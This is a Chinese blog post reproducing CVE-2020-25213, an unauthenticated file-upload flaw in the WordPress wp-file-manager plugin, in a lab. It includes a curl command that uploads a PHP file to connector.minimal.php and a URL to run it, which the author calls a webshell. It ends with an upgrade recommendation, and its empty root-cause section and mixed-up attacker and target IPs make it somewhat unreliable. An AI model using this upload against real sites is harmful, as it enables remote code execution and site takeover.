CVE-2020-25213 WordPress远程代码执行漏洞复现

0x00 漏洞介绍

WordPress是一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。而WordPress的文件管理器插件(wp-file-manager)6.9版本之前存在安全漏洞,该漏洞允许远程攻击者上传和执行任意PHP代码。

0x01 漏洞环境

  • 攻击机:192.168.75.178 kali-2021
  • 目标机+网站管理员:192.168.91.137 Ubuntu 18.04 server64
  • 工具:https://192.168.91.137:10000、火狐浏览器(CSRF漏洞复现时,不能使用谷歌浏览器,谷歌浏览器自带屏蔽CSRF)
  • wp-file-manager版本:6.9

0x02 漏洞搭建

1、下载wordpress和插件

wordpress:https://wordpress.org/download/

file-manager6.0:https://wordpress.org/plugins/wp-file-manager/advanced/

image-20220125164847648

2、然后搭建数据库、添加写入权限,注册管理员账号密码等完成安装

username:wordpress

password:vJknM3*1XtUBrqy3eU

image-20220125171712227

3、加载插件,直接将插件拖入到网站根目录解压

image-20220125172827580

4、在网站激活

image-20220125173301396

0x03 影响范围

WordPress 文件管理器(wp-file-manager)插件 6.0-6.8 版本

0x04 漏洞条件

Wordpress CMS、php、mysql版本没限制,只要能搭建起来网站,并且插件的版本在6.0-6.8即可

0x05 漏洞原理

0x06 漏洞复现

1、访问http://192.168.75.178/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php出现{"error":["errUnknownCmd"]}即漏洞存在

image-20220125173524631

2、新建一个test.php,内容为<?php phpinfo()?>

cd Desktop
echo "<?php phpinfo()?>" > test.php

image-20220125175600074

3、之后在终端输入下面的命令:

curl -F cmd=upload -F target=l1_ -F upload[]=@test.php -XPOST "http://192.168.75.178/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"

image-20220125175652128

4、访问下面的链接,成功获得webshell

http://192.168.75.178/wp-content/plugins/wp-file-manager/lib/files/test.php

image-20220125175417054

0x07 漏洞修复建议

升级插件版本即可

posted @   谨言慎行啊  阅读(801)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
点击右上角即可分享
微信分享提示